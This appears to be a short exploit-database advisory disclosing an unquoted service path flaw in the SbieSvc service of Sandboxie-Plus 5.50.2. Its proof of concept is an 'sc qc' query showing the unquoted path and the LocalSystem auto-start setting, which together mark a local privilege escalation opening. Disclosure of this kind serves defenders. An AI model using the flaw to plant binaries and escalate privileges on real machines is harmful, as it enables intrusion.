Sandboxie-Plus version 5.50.2 suffers from an unquoted service path vulnerability.
17c49ab5b6cc77ebb68f99425b768e40# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-03-09
# Vendor : David Xanatos
# Version : SbieSvc 5.50.2
# Vendor Homepage : https://sandboxie-plus.com/
# Tested on OS: Windows 10 Pro x64
#PoC :
==============
C:\>sc qc SbieSvc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: SbieSvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
GRUPPO_ORDINE_CARICAMENTO : UIGroup
TAG : 0
NOME_VISUALIZZATO : Sandboxie Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem